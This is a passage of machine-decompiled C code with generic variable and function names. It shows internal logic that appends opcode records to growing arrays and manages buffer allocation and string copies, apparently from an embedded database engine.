				signed int _t1015;
				signed int _t1018;
				intOrPtr _t1022;
				signed int _t1023;
				intOrPtr _t1024;
				signed int _t1026;
				signed int _t1027;
				void* _t1033;
				void* _t1034;
				intOrPtr _t1036;
				void* _t1038;
				intOrPtr _t1044;
				void* _t1047;
				intOrPtr _t1048;
				void* _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1055;
				signed int _t1060;
				void* _t1064;
				intOrPtr _t1072;
				signed int _t1073;
				intOrPtr _t1075;
				intOrPtr _t1076;
				signed int _t1077;
				signed int _t1078;
				intOrPtr _t1079;
				signed int _t1080;
				intOrPtr _t1081;
				intOrPtr _t1082;
				intOrPtr _t1083;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1087;
				signed int _t1089;
				char _t1091;
				signed int _t1092;
				signed int _t1094;
				signed int _t1096;
				signed int _t1097;
				intOrPtr _t1098;
				signed int _t1099;
				signed int _t1101;
				signed int _t1104;
				short* _t1106;
				signed int _t1108;
				signed int _t1109;
				signed int _t1110;
				signed int _t1111;
				short* _t1113;
				short* _t1115;
				intOrPtr _t1116;
				signed int _t1117;
				signed int _t1118;
				signed int _t1119;
				signed int _t1120;
				void* _t1121;
				intOrPtr _t1124;
				signed int _t1125;
				intOrPtr _t1126;
				signed int _t1127;
				void* _t1129;
				signed int _t1131;
				intOrPtr _t1132;
				char _t1133;
				intOrPtr _t1135;
				signed int _t1136;
				intOrPtr _t1137;
				signed int _t1138;
				signed int _t1139;
				signed int _t1141;
				intOrPtr _t1142;
				signed int _t1143;
				intOrPtr _t1144;
				signed int _t1145;
				intOrPtr _t1148;
				signed int _t1149;
				intOrPtr _t1150;
				signed int _t1151;
				short* _t1154;
				intOrPtr _t1156;
				signed int _t1157;
				signed int _t1158;
				intOrPtr _t1159;
				signed int _t1160;
				intOrPtr* _t1161;
				signed int _t1162;
				signed int _t1163;
				intOrPtr _t1164;
				short* _t1168;
				signed int _t1169;
				intOrPtr _t1170;
				signed int _t1172;
				intOrPtr _t1173;
				intOrPtr _t1174;
				intOrPtr _t1183;
				intOrPtr _t1184;
				intOrPtr _t1185;
				signed int _t1186;
				intOrPtr _t1189;
				intOrPtr* _t1190;
				signed int _t1194;
				signed int _t1195;
				signed char _t1196;
				intOrPtr _t1203;
				intOrPtr _t1223;
				intOrPtr _t1224;
				intOrPtr _t1226;
				signed int _t1227;
				signed int _t1228;
				signed int _t1230;
				signed int _t1232;
				signed int _t1233;
				intOrPtr _t1234;
				signed int _t1235;
				intOrPtr* _t1237;
				intOrPtr _t1239;
				signed int _t1240;
				intOrPtr _t1241;
				intOrPtr* _t1242;
				intOrPtr _t1243;
				intOrPtr _t1244;
				intOrPtr _t1245;
				intOrPtr _t1246;
				void* _t1247;
				intOrPtr _t1248;
				signed int _t1249;
				signed int _t1251;
				void* _t1252;
				intOrPtr _t1253;
				intOrPtr _t1254;
				signed int _t1255;
				signed int _t1257;
				void* _t1258;
				intOrPtr _t1261;
				signed int _t1262;
				intOrPtr _t1263;
				signed int _t1264;
				intOrPtr _t1265;
				void* _t1266;
				signed int _t1267;
				intOrPtr* _t1269;
				void* _t1271;
				void* _t1272;
				void* _t1273;
				void* _t1274;

				_v20 = 0;
				_v28 = 0;
				if(_a28 == 0) {
					L2:
					_v36 = 0;
					L3:
					_t1237 = _a4;
					_t1269 =  *((intOrPtr*)(_t1237 + 0xc));
					_v40 = _t1269;
					if(_t1269 == 0) {
						_t1269 = E00FD6AF7( *_t1237);
						_t1272 = _t1272 + 4;
						_v40 = _t1269;
						 *((intOrPtr*)(_t1237 + 0xc)) = _t1269;
						if(_t1269 != 0) {
							E00FD6487(_t1269, 0x15);
							_t1272 = _t1272 + 8;
						}
					}
					_t836 =  *((intOrPtr*)(_a8 + 0xc));
					_t1099 = _a32;
					_t1183 = _a16 + 1;
					_v12 = _t836;
					_v32 = _t1183;
					_v16 = 0;
					if(_t836 <= 0) {
						L36:
						_t837 = _a8;
						if( *((intOrPtr*)(_t837 + 0x2c)) == 0) {
							L50:
							if(_a24 == 0) {
								L84:
								_v8 = 0;
								_t839 =  *((intOrPtr*)(_a8 + 0x14));
								_a28 = _t839;
								if(_t839 == 0) {
									L311:
									_t840 = _a40;
									if(_t840 == 0) {
										return _t840;
									}
									 *_t840 = _v28;
									return _t840;
								}
								_t1184 = _a20;
								_t1101 = 0;
								do {
									if( *((intOrPtr*)(_t1184 + _t1101 * 4)) == 0) {
										goto L310;
									}
									_t1185 = _a4;
									_t1072 =  *((intOrPtr*)(_t1185 + 0x38));
									_t842 =  *((intOrPtr*)(_t839 + 4)) + 1;
									_v20 = _t842;
									_a24 =  *((intOrPtr*)(_t1185 + 0x3c));
									if(_t842 > _t1072) {
										L95:
										_t843 =  *((intOrPtr*)(_t1185 + 0x48));
										_t1186 = _t843 + 1;
										_a24 = _t1186;
										 *((intOrPtr*)(_a4 + 0x48)) = _t843 + _v20;
										L96:
										_t845 = _a28;
										_t1104 = 0;
										_v16 = 0;
										if( *((intOrPtr*)(_t845 + 4)) <= 0) {
											L125:
											_t1073 =  *(_t1269 + 0xc);
											_t846 =  *(_t1269 + 0x10);
											if(_t846 > _t1073) {
												L136:
												 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
												_t1106 =  *((intOrPtr*)(_t1269 + 0x14)) + (_t1073 + _t1073 * 4) * 4;
												 *((intOrPtr*)(_t1106 + 4)) = _a16;
												 *_t1106 = 9;
												 *((char*)(_t1106 + 3)) = 0;
												 *((intOrPtr*)(_t1106 + 8)) = _v16 + _a24;
												 *(_t1106 + 0xc) = 0;
												 *(_t1106 + 0x10) = 0;
												 *((char*)(_t1269 + 0x6e)) = 0;
												L137:
												_t1108 =  *(_t1269 + 0xc);
												_v16 =  *((intOrPtr*)(_a20 + _v8 * 4));
												_t853 = _a28;
												_v20 = _t1108;
												_t409 = _t853 + 4; // 0x45890c46
												_t854 =  *(_t1269 + 0x10);
												_t1075 =  *_t409 + 1;
												if(_t854 > _t1108) {
													L148:
													_t855 =  *((intOrPtr*)(_t1269 + 0x14));
													 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
													_t1109 = _t1108 + _t1108 * 4;
													 *((intOrPtr*)(_t855 + 4 + _t1109 * 4)) = _a24;
													 *((short*)(_t855 + _t1109 * 4)) = 0x4f;
													 *((char*)(_t855 + 3 + _t1109 * 4)) = 0;
													 *((intOrPtr*)(_t855 + 8 + _t1109 * 4)) = _t1075;
													 *((intOrPtr*)(_t855 + 0xc + _t1109 * 4)) = _v16;
													 *(_t855 + 0x10 + _t1109 * 4) = 0;
													 *((char*)(_t1269 + 0x6e)) = 0;
													L149:
													_t1076 = _a28;
													E00FC6D57(_t1269, _t1076);
													_t450 = _t1076 + 4; // 0x45890c46
													_t1077 = _a24;
													_t1239 = _a4;
													E00FC0B77(_t1239, _t1077,  *_t450 + 1);
													_t860 = _a28;
													_t1272 = _t1272 + 0x14;
													_t454 = _t860 + 0x18; // 0x4850fc0
													_t1110 =  *_t454 & 0x000000ff;
													if(_t1110 != 0) {
														_t861 = _a32;
														if(_t861 == 0x63) {
															_t862 = 2;
															_t1111 =  ==  ? 2 : _t1110;
															_v16 = _t1111;
														} else {
															_t1111 = _t861;
															_v16 = _t861;
															_t862 = 2;
														}
														if(_v28 != 0) {
															if(_t1111 != 4) {
																_t1147 =  ==  ? _t862 : _t1111;
																_v16 =  ==  ? _t862 : _t1111;
															} else {
																_v16 = 5;
															}
														}
														_t863 =  *(_t1239 + 0x15);
														if(_t863 != 0) {
															_t864 = _t863 - 1;
															 *(_t1239 + 0x15) = _t864;
															_v12 =  *((intOrPtr*)(_t1239 + 0x18 + (_t864 & 0x000000ff) * 4));
														} else {
															 *((intOrPtr*)(_t1239 + 0x48)) =  *((intOrPtr*)(_t1239 + 0x48)) + 1;
															_v12 =  *((intOrPtr*)(_t1239 + 0x48));
														}
														_t1078 =  *(_t1269 + 0xc);
														_t867 =  *(_t1269 + 0x10);
														if(_t867 > _t1078) {
															L173:
															 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
															_t1079 = _v12;
															_t1113 =  *((intOrPtr*)(_t1269 + 0x14)) + (_t1078 + _t1078 * 4) * 4;
															 *_t1113 = 9;
															 *((char*)(_t1113 + 3)) = 0;
															 *((intOrPtr*)(_t1113 + 4)) = _a16 - _v36;
															 *((intOrPtr*)(_t1113 + 8)) = _t1079;
															 *(_t1113 + 0xc) = 0;
															 *(_t1113 + 0x10) = 0;
															 *((char*)(_t1269 + 0x6e)) = 0;
															goto L175;
														} else {
															if(_t867 == 0) {
																_t974 = 0x33;
															} else {
																_t974 = _t867 + _t867;
															}
															_t1254 = E00FBE7D7( *_t1269,  *((intOrPtr*)(_t1269 + 0x14)), _t974 + _t974 * 4 << 2);
															_t1272 = _t1272 + 0xc;
															if(_t1254 == 0) {
																_t1079 = _v12;
																L175:
																_t1240 =  *(_t1269 + 0xc);
																_t871 =  *(_t1269 + 0x10);
																_v20 = _t1240;
																if(_t871 > _t1240) {
																	L186:
																	 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
																	_t1115 =  *((intOrPtr*)(_t1269 + 0x14)) + (_t1240 + _t1240 * 4) * 4;
																	 *_t1115 = 0x23;
																	 *((char*)(_t1115 + 3)) = 0;
																	 *((intOrPtr*)(_t1115 + 4)) = _v8 + 1 + _a12;
																	 *(_t1115 + 8) = 0;
																	 *((intOrPtr*)(_t1115 + 0xc)) = _t1079;
																	 *(_t1115 + 0x10) = 0;
																	 *((char*)(_t1269 + 0x6e)) = 0;
																	L187:
																	_t1189 =  *((intOrPtr*)(_t1269 + 0x14));
																	_t1116 =  *_t1269;
																	_t876 = _t1240;
																	if(_t1189 == 0 ||  *((char*)(_t1116 + 0x1e)) != 0) {
																		E00FA7BC7(_t1116, 0xfffffff2, _a24);
																		_t1117 = _a24;
																	} else {
																		if(_t1240 < 0) {
																			_t876 =  *(_t1269 + 0xc) - 1;
																		}
																		_t1252 = _t1189 + (_t876 + _t876 * 4) * 4;
																		E00FA7BC7(_t1116,  *((char*)(_t1252 + 1)),  *((intOrPtr*)(_t1189 + 0x10 + (_t876 + _t876 * 4) * 4)));
																		_t1117 = _a24;
																		 *((intOrPtr*)(_t1252 + 0x10)) = _t1117;
																		 *((char*)(_t1252 + 1)) = 0xf2;
																	}
																	_t1241 = _a28;
																	_t1190 = _a4;
																	_t558 = _t1241 + 4; // 0x45890c46
																	_t879 =  *_t558 + 1;
																	_t1272 = _t1272 + 0xc;
																	if(_t879 >  *((intOrPtr*)(_t1190 + 0x38))) {
																		 *((intOrPtr*)(_t1190 + 0x38)) = _t879;
																		 *((intOrPtr*)(_t1190 + 0x3c)) = _t1117;
																	}
																	_t880 = _v16;
																	if(_t880 <= 0) {
																		L271:
																		_t1242 =  *((intOrPtr*)(_t1190 + 0xc));
																		_t1080 =  *(_t1242 + 0xc);
																		_t881 =  *(_t1242 + 0x10);
																		_a24 = _t1080;
																		if(_t881 > _t1080) {
																			L282:
																			_t882 =  *((intOrPtr*)(_t1242 + 0x14));
																			 *(_t1242 + 0xc) =  *(_t1242 + 0xc) + 1;
																			_t1118 = _t1080 + _t1080 * 4;
																			 *((intOrPtr*)(_t882 + 4 + _t1118 * 4)) = _a12;
																			 *((short*)(_t882 + _t1118 * 4)) = 0x2e;
																			 *((char*)(_t882 + 3 + _t1118 * 4)) = 0;
																			 *(_t882 + 8 + _t1118 * 4) = 0;
																			 *((intOrPtr*)(_t882 + 0xc + _t1118 * 4)) = _v12;
																			 *(_t882 + 0x10 + _t1118 * 4) = 0;
																			 *((char*)(_t1242 + 0x6e)) = 0;
																			L283:
																			E00FC5B07(_a4, _a8, _a12, 0);
																			_t1119 =  *(_t1242 + 0xc);
																			_t884 =  *(_t1242 + 0x10);
																			_t1272 = _t1272 + 0x10;
																			_v28 = _t1119;
																			if(_t884 > _t1119) {
																				L295:
																				_t885 =  *((intOrPtr*)(_t1242 + 0x14));
																				 *(_t1242 + 0xc) =  *(_t1242 + 0xc) + 1;
																				_t1120 = _t1119 + _t1119 * 4;
																				 *((short*)(_t885 + _t1120 * 4)) = 0x5b;
																				 *((char*)(_t885 + 3 + _t1120 * 4)) = 0;
																				 *((intOrPtr*)(_t885 + 4 + _t1120 * 4)) = _a12;
																				 *(_t885 + 8 + _t1120 * 4) = 0;
																				 *(_t885 + 0xc + _t1120 * 4) = 0;
																				 *(_t885 + 0x10 + _t1120 * 4) = 0;
																				 *((char*)(_t1242 + 0x6e)) = 0;
																				L296:
																				_t1194 =  *(_t1242 + 0xc);
																				_t886 = _a24;
																				if(_t1194 > _t886) {
																					 *( *((intOrPtr*)(_t1242 + 0x14)) + 8 + (_t886 + _t886 * 4) * 4) = _t1194;
																				}
																				_v28 = 1;
																				goto L299;
																			}
																			if(_t884 == 0) {
																				_t892 = 0x33;
																			} else {
																				_t892 = _t884 + _t884;
																			}
																			_t1082 = E00FBE7D7( *_t1242,  *((intOrPtr*)(_t1242 + 0x14)), _t892 + _t892 * 4 << 2);
																			_t1272 = _t1272 + 0xc;
																			if(_t1082 == 0) {
																				goto L296;
																			} else {
																				_t1124 =  *_t1242;
																				if(_t1124 == 0 || _t1082 <  *((intOrPtr*)(_t1124 + 0xe8)) || _t1082 >=  *((intOrPtr*)(_t1124 + 0xec))) {
																					_t896 =  *0x48182c(_t1082);
																					_t1272 = _t1272 + 4;
																					_t1125 = _t896;
																				} else {
																					_t1125 =  *(_t1124 + 0xd8) & 0x0000ffff;
																				}
																				_t1119 = _v28;
																				 *(_t1242 + 0x10) = 0xcccccccd * _t1125 >> 0x20 >> 4;
																				 *((intOrPtr*)(_t1242 + 0x14)) = _t1082;
																				goto L295;
																			}
																		}
																		if(_t881 == 0) {
																			_t899 = 0x33;
																		} else {
																			_t899 = _t881 + _t881;
																		}
																		_t1083 = E00FBE7D7( *_t1242,  *((intOrPtr*)(_t1242 + 0x14)), _t899 + _t899 * 4 << 2);
																		_t1272 = _t1272 + 0xc;
																		if(_t1083 == 0) {
																			_a24 = 1;
																			goto L283;
																		} else {
																			_t1126 =  *_t1242;
																			if(_t1126 == 0 || _t1083 <  *((intOrPtr*)(_t1126 + 0xe8)) || _t1083 >=  *((intOrPtr*)(_t1126 + 0xec))) {
																				_t903 =  *0x48182c(_t1083);
																				_t1272 = _t1272 + 4;
																				_t1127 = _t903;
																			} else {
																				_t1127 =  *(_t1126 + 0xd8) & 0x0000ffff;
																			}
																			 *((intOrPtr*)(_t1242 + 0x14)) = _t1083;
																			_t1080 = _a24;
																			 *(_t1242 + 0x10) = 0xcccccccd * _t1127 >> 0x20 >> 4;
																			goto L282;
																		}
																	} else {
																		if(_t880 <= 3) {
																			_v68 =  *_t1190;
																			_t590 = _t1241 + 4; // 0x45890c46
																			_t1129 =  <=  ? 0x477ca0 : 0x477c94;
																			_t1084 = 0;
																			_v64 = 0;
																			_v60 = 0;
																			_v56 = 0;
																			_v52 = 0;
																			_v48 = 0xc8;
																			_v43 = 1;
																			_v44 = 0;
																			_a24 = 0x477c94;
																			if( *_t590 <= 0) {
																				L206:
																				_t909 =  <=  ? 0x477cbc : 0x477cac;
																				E00FD1FF7(0x477cbc,  &_v68,  <=  ? 0x477cbc : 0x477cac, 0xffffffff);
																				_t1249 = _v60;
																				_t1273 = _t1272 + 0xc;
																				if(_t1249 == 0) {
																					L234:
																					_t1085 =  *(_t1269 + 0xc);
																					_t912 =  *(_t1269 + 0x10);
																					if(_t912 > _t1085) {
																						L245:
																						_t913 =  *((intOrPtr*)(_t1269 + 0x14));
																						 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
																						_t1131 = _t1085 + _t1085 * 4;
																						 *((short*)(_t913 + _t1131 * 4)) = 0x27;
																						 *((char*)(_t913 + 3 + _t1131 * 4)) = 0;
																						 *((intOrPtr*)(_t913 + 4 + _t1131 * 4)) = 0x13;
																						 *((intOrPtr*)(_t913 + 8 + _t1131 * 4)) = _v16;
																						 *(_t913 + 0xc + _t1131 * 4) = 0;
																						 *(_t913 + 0x10 + _t1131 * 4) = 0;
																						 *((char*)(_t1269 + 0x6e)) = 0;
																						L246:
																						_t1203 =  *((intOrPtr*)(_t1269 + 0x14));
																						_t1132 =  *_t1269;
																						if(_t1203 == 0 ||  *((char*)(_t1132 + 0x1e)) != 0) {
																							E00FA7BC7(_t1132, 0, _t1249);
																							_t1272 = _t1273 + 0xc;
																							goto L259;
																						} else {
																							if(_t1085 < 0) {
																								_t1085 =  *(_t1269 + 0xc) - 1;
																							}
																							_t1086 = _t1203 + (_t1085 + _t1085 * 4) * 4;
																							_v16 = _t1086;
																							E00FA7BC7(_t1132,  *((char*)(_t1086 + 1)),  *((intOrPtr*)(_t1203 + 0x10 + (_t1085 + _t1085 * 4) * 4)));
																							_t1272 = _t1273 + 0xc;
																							 *(_t1086 + 0x10) = 0;
																							if(_t1249 != 0) {
																								_t1087 = _t1249;
																								if( *_t1249 == 0) {
																									L255:
																									_t1089 = _t1087 - _t1249 & 0x3fffffff;
																									_t698 = _t1089 + 1; // 0x2
																									_t930 = E00FBE727( *_t1269, _t698);
																									_t1272 = _t1272 + 8;
																									_a24 = _t930;
																									if(_t930 != 0) {
																										E00FE7337(_t930, _t1249, _t1089);
																										_t930 = _a24;
																										_t1272 = _t1272 + 0xc;
																										 *((char*)(_t930 + _t1089)) = 0;
																									}
																									_t1136 = _v16;
																									 *((intOrPtr*)(_t1136 + 0x10)) = _t930;
																									 *((char*)(_t1136 + 1)) = 0xff;
																									goto L259;
																								} else {
																									goto L254;
																								}
																								do {
																									L254:
																									_t1087 = _t1087 + 1;
																								} while ( *_t1087 != 0);
																								goto L255;
																							} else {
																								 *(_t1086 + 0x10) = _t1249;
																								 *((char*)(_t1086 + 1)) = 0;
																								L259:
																								_t1133 = _v68;
																								if(_t1133 == 0) {
																									L264:
																									if(_t1249 != 0) {
																										if( *0x481808 == 0) {
																											 *0x481824(_t1249);
																											_t1272 = _t1272 + 4;
																										} else {
																											_t916 =  *0x481910;
																											if(_t916 != 0) {
																												 *0x481850(_t916);
																												_t1272 = _t1272 + 4;
																											}
																											_t1135 =  *0x487020 +  ~( *0x48182c(_t1249));
																											_t919 =  *0x487044;
																											_t920 =  >  ? _t1135 : _t919;
																											 *0x487020 = _t1135;
																											 *0x487044 =  >  ? _t1135 : _t919;
																											 *0x481824(_t1249);
																											_t922 =  *0x481910;
																											_t1272 = _t1272 + 8;
																											if(_t922 != 0) {
																												 *0x481858(_t922);
																												_t1272 = _t1272 + 4;
																											}
																										}
																									}
																									L299:
																									_t1195 =  *(_t1269 + 0xc);
																									_t887 = _v20;
																									if(_t1195 > _t887) {
																										 *( *((intOrPtr*)(_t1269 + 0x14)) + 8 + (_t887 + _t887 * 4) * 4) = _t1195;
																									}
																									_t1081 = _v12;
																									if(_t1081 == 0) {
																										L308:
																										_t1184 = _a20;
																										_t1101 = _v8;
																										L309:
																										_t839 = _a28;
																										goto L310;
																									} else {
																										_t1248 = _a4;
																										_t1196 =  *((intOrPtr*)(_t1248 + 0x15));
																										if(_t1196 >= 8) {
																											goto L308;
																										}
																										_t1121 = 0;
																										_t818 = _t1248 + 0x60; // 0x60
																										_t888 = _t818;
																										while( *((intOrPtr*)(_t888 + 0x10)) != _t1081) {
																											_t1121 = _t1121 + 1;
																											_t888 = _t888 + 0x18;
																											if(_t1121 < 0xa) {
																												continue;
																											}
																											 *((intOrPtr*)(_t1248 + 0x18 + (_t1196 & 0x000000ff) * 4)) = _t1081;
																											 *((char*)(_t1248 + 0x15)) =  *((char*)(_t1248 + 0x15)) + 1;
																											goto L308;
																										}
																										 *((char*)(_t888 + 9)) = 1;
																										goto L308;
																									}
																								}
																								if(_t1249 == 0) {
																									goto L299;
																								}
																								if(_t1249 <  *((intOrPtr*)(_t1133 + 0xe8)) || _t1249 >=  *((intOrPtr*)(_t1133 + 0xec))) {
																									goto L264;
																								} else {
																									 *_t1249 =  *(_t1133 + 0xe4);
																									 *((intOrPtr*)(_t1133 + 0xdc)) =  *((intOrPtr*)(_t1133 + 0xdc)) - 1;
																									 *(_t1133 + 0xe4) = _t1249;
																									goto L299;
																								}
																							}
																						}
																					}
																					if(_t912 == 0) {
																						_t932 = 0x33;
																					} else {
																						_t932 = _t912 + _t912;
																					}
																					_t935 = E00FBE7D7( *_t1269,  *((intOrPtr*)(_t1269 + 0x14)), _t932 + _t932 * 4 << 2);
																					_t1273 = _t1273 + 0xc;
																					_a24 = _t935;
																					if(_t935 == 0) {
																						_t1085 = 1;
																						goto L246;
																					} else {
																						_t1137 =  *_t1269;
																						if(_t1137 == 0 || _t935 <  *((intOrPtr*)(_t1137 + 0xe8)) || _t935 >=  *((intOrPtr*)(_t1137 + 0xec))) {
																							_t936 =  *0x48182c(_t935);
																							_t1273 = _t1273 + 4;
																							_t1138 = _t936;
																						} else {
																							_t1138 =  *(_t1137 + 0xd8) & 0x0000ffff;
																						}
																						 *(_t1269 + 0x10) = 0xcccccccd * _t1138 >> 0x20 >> 4;
																						 *((intOrPtr*)(_t1269 + 0x14)) = _a24;
																						goto L245;
																					}
																				}
																				_t940 = _v56;
																				 *((char*)(_t940 + _t1249)) = 0;
																				if(_v43 == 0) {
																					goto L234;
																				}
																				_t1206 = _v64;
																				if(_t1249 != _v64) {
																					goto L234;
																				}
																				_t1091 = _v68;
																				_t621 = _t940 + 1; // 0x1
																				_t1139 = _t621;
																				_a24 = _t1139;
																				if(_t1091 == 0) {
																					L217:
																					_t633 = _t1139 - 1; // 0x0
																					if(_t633 > 0x7ffffefe) {
																						_t1249 = 0;
																						_v24 = 0;
																						L229:
																						if(_t1091 != 0) {
																							 *((char*)(_t1091 + 0x1e)) = 1;
																						}
																						L231:
																						_t1139 = _a24;
																						_t1206 = _v64;
																						L232:
																						if(_t1249 != 0) {
																							E00FE7337(_t1249, _t1206, _t1139);
																							_t1273 = _t1273 + 0xc;
																						}
																						goto L234;
																					}
																					if( *0x481808 == 0) {
																						_t1249 =  *0x481820(_t1139);
																						_v24 = _t1249;
																						L225:
																						_t1273 = _t1273 + 4;
																						L226:
																						if(_t1249 != 0) {
																							goto L231;
																						}
																						goto L229;
																					}
																					_t944 =  *0x481910;
																					if(_t944 != 0) {
																						 *0x481850(_t944);
																						_t1139 = _a24;
																						_t1273 = _t1273 + 4;
																					}
																					E00FAB537(_t1206, _t1139,  &_v24);
																					_t947 =  *0x481910;
																					_t1273 = _t1273 + 8;
																					if(_t947 == 0) {
																						_t1249 = _v24;
																						goto L226;
																					} else {
																						 *0x481858(_t947);
																						_t1249 = _v24;
																						goto L225;
																					}
																				}
																				if( *((char*)(_t1091 + 0x1e)) == 0) {
																					if( *((char*)(_t1091 + 0xda)) == 0 || _t1139 > ( *(_t1091 + 0xd8) & 0x0000ffff)) {
																						goto L217;
																					} else {
																						_t1249 =  *(_t1091 + 0xe4);
																						if(_t1249 == 0) {
																							goto L217;
																						}
																						 *((intOrPtr*)(_t1091 + 0xdc)) =  *((intOrPtr*)(_t1091 + 0xdc)) + 1;
																						 *(_t1091 + 0xe4) =  *_t1249;
																						_t952 =  *((intOrPtr*)(_t1091 + 0xdc));
																						if(_t952 >  *((intOrPtr*)(_t1091 + 0xe0))) {
																							 *((intOrPtr*)(_t1091 + 0xe0)) = _t952;
																						}
																						goto L232;
																					}
																				}
																				_t1249 = 0;
																				goto L232;
																			}
																			_t1271 = _t1129;
																			do {
																				_t599 = _t1241 + 8; // 0x104639f4
																				E00FD1FF7( *( *_t599 + _t1084 * 4) +  *( *_t599 + _t1084 * 4) * 2,  &_v68, _t1271, 0xffffffff);
																				_t1271 = 0x477ca8;
																				E00FD1FF7( *( *_t599 + _t1084 * 4) +  *( *_t599 + _t1084 * 4) * 2,  &_v68,  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x10)) + ( *( *_t599 + _t1084 * 4) +  *( *_t599 + _t1084 * 4) * 2) * 8)), 0xffffffff);
																				_t1241 = _a28;
																				_t1084 = _t1084 + 1;
																				_t1272 = _t1272 + 0x18;
																				_t611 = _t1241 + 4; // 0x45890c46
																			} while (_t1084 <  *_t611);
																			_t1269 = _v40;
																			goto L206;
																		}
																		if(_t880 != 4) {
																			goto L271;
																		}
																		_t1251 =  *(_t1269 + 0xc);
																		if( *(_t1269 + 0x10) > _t1251) {
																			L201:
																			_t961 =  *((intOrPtr*)(_t1269 + 0x14));
																			 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
																			_t1141 = _t1251 + _t1251 * 4;
																			 *((short*)(_t961 + _t1141 * 4)) = 0x60;
																			 *((char*)(_t961 + 3 + _t1141 * 4)) = 0;
																			 *(_t961 + 4 + _t1141 * 4) = 0;
																			 *((intOrPtr*)(_t961 + 8 + _t1141 * 4)) = _a36;
																			 *(_t961 + 0xc + _t1141 * 4) = 0;
																			 *(_t961 + 0x10 + _t1141 * 4) = 0;
																			 *((char*)(_t1269 + 0x6e)) = 0;
																			goto L299;
																		}
																		_t962 = E00FA96F7(_t1269);
																		_t1272 = _t1272 + 4;
																		if(_t962 != 0) {
																			goto L299;
																		}
																		goto L201;
																	}
																}
																if(_t871 == 0) {
																	_t967 = 0x33;
																} else {
																	_t967 = _t871 + _t871;
																}
																_t1253 = E00FBE7D7( *_t1269,  *((intOrPtr*)(_t1269 + 0x14)), _t967 + _t967 * 4 << 2);
																_t1272 = _t1272 + 0xc;
																if(_t1253 == 0) {
																	_t1240 = 1;
																	_v20 = 1;
																	goto L187;
																} else {
																	_t1142 =  *_t1269;
																	if(_t1142 == 0 || _t1253 <  *((intOrPtr*)(_t1142 + 0xe8)) || _t1253 >=  *((intOrPtr*)(_t1142 + 0xec))) {
																		_t971 =  *0x48182c(_t1253);
																		_t1272 = _t1272 + 4;
																		_t1143 = _t971;
																	} else {
																		_t1143 =  *(_t1142 + 0xd8) & 0x0000ffff;
																	}
																	 *((intOrPtr*)(_t1269 + 0x14)) = _t1253;
																	_t1240 = _v20;
																	 *(_t1269 + 0x10) = 0xcccccccd * _t1143 >> 0x20 >> 4;
																	goto L186;
																}
															} else {
																_t1144 =  *_t1269;
																if(_t1144 == 0 || _t1254 <  *((intOrPtr*)(_t1144 + 0xe8)) || _t1254 >=  *((intOrPtr*)(_t1144 + 0xec))) {
																	_t978 =  *0x48182c(_t1254);
																	_t1272 = _t1272 + 4;
																	_t1145 = _t978;
																} else {
																	_t1145 =  *(_t1144 + 0xd8) & 0x0000ffff;
																}
																 *(_t1269 + 0x10) = 0xcccccccd * _t1145 >> 0x20 >> 4;
																 *((intOrPtr*)(_t1269 + 0x14)) = _t1254;
																goto L173;
															}
														}
													}
													_t455 = _t860 + 4; // 0x45890c46
													_t1101 = _v8;
													_t1184 = _a20;
													_t982 =  *_t455 + 1;
													if(_t982 >  *((intOrPtr*)(_t1239 + 0x38))) {
														 *((intOrPtr*)(_t1239 + 0x38)) = _t982;
														 *((intOrPtr*)(_t1239 + 0x3c)) = _t1077;
													}
													goto L309;
												}
												if(_t854 == 0) {
													_t983 = 0x33;
												} else {
													_t983 = _t854 + _t854;
												}
												_t1243 = E00FBE7D7( *_t1269,  *((intOrPtr*)(_t1269 + 0x14)), _t983 + _t983 * 4 << 2);
												_t1272 = _t1272 + 0xc;
												if(_t1243 == 0) {
													goto L149;
												} else {
													_t1148 =  *_t1269;
													if(_t1148 == 0 || _t1243 <  *((intOrPtr*)(_t1148 + 0xe8)) || _t1243 >=  *((intOrPtr*)(_t1148 + 0xec))) {
														_t987 =  *0x48182c(_t1243);
														_t1272 = _t1272 + 4;
														_t1149 = _t987;
													} else {
														_t1149 =  *(_t1148 + 0xd8) & 0x0000ffff;
													}
													_t1108 = _v20;
													 *(_t1269 + 0x10) = 0xcccccccd * _t1149 >> 0x20 >> 4;
													 *((intOrPtr*)(_t1269 + 0x14)) = _t1243;
													goto L148;
												}
											}
											if(_t846 == 0) {
												_t990 = 0x33;
											} else {
												_t990 = _t846 + _t846;
											}
											_t1244 = E00FBE7D7( *_t1269,  *((intOrPtr*)(_t1269 + 0x14)), _t990 + _t990 * 4 << 2);
											_t1272 = _t1272 + 0xc;
											if(_t1244 == 0) {
												goto L137;
											} else {
												_t1150 =  *_t1269;
												if(_t1150 == 0 || _t1244 <  *((intOrPtr*)(_t1150 + 0xe8)) || _t1244 >=  *((intOrPtr*)(_t1150 + 0xec))) {
													_t994 =  *0x48182c(_t1244);
													_t1272 = _t1272 + 4;
													_t1151 = _t994;
												} else {
													_t1151 =  *(_t1150 + 0xd8) & 0x0000ffff;
												}
												 *(_t1269 + 0x10) = 0xcccccccd * _t1151 >> 0x20 >> 4;
												 *((intOrPtr*)(_t1269 + 0x14)) = _t1244;
												goto L136;
											}
										}
										_v20 = _t1186;
										do {
											_t293 = _t845 + 8; // 0x104639f4
											_t1092 =  *(_t1269 + 0xc);
											_t998 =  *((intOrPtr*)( *_t293 + _t1104 * 4));
											_v12 = _t998;
											_t999 =  *(_t1269 + 0x10);
											if(_t998 !=  *((intOrPtr*)(_a8 + 8))) {
												if(_t999 > _t1092) {
													L122:
													 *(_t1269 + 0xc) =  *(_t1269 + 0xc) + 1;
													_t1154 =  *((intOrPtr*)(_t1269 + 0x14)) + (_t1092 + _t1092 * 4) * 4;
													 *_t1154 = 9;
													 *((char*)(_t1154 + 3)) = 0;
													 *((intOrPtr*)(_t1154 + 4)) = _v12 + _v32;
													 *((intOrPtr*)(_t1154 + 8)) = _v20;
													 *(_t1154 + 0xc) = 0;
													 *(_t1154 + 0x10) = 0;
													L123:
													 *((char*)(_t1269 + 0x6e)) = 0;
													goto L124;
												}
												if(_t999 == 0) {
													_t1003 = 0x33;
												} else {
													_t1003 = _t999 + _t999;
												}
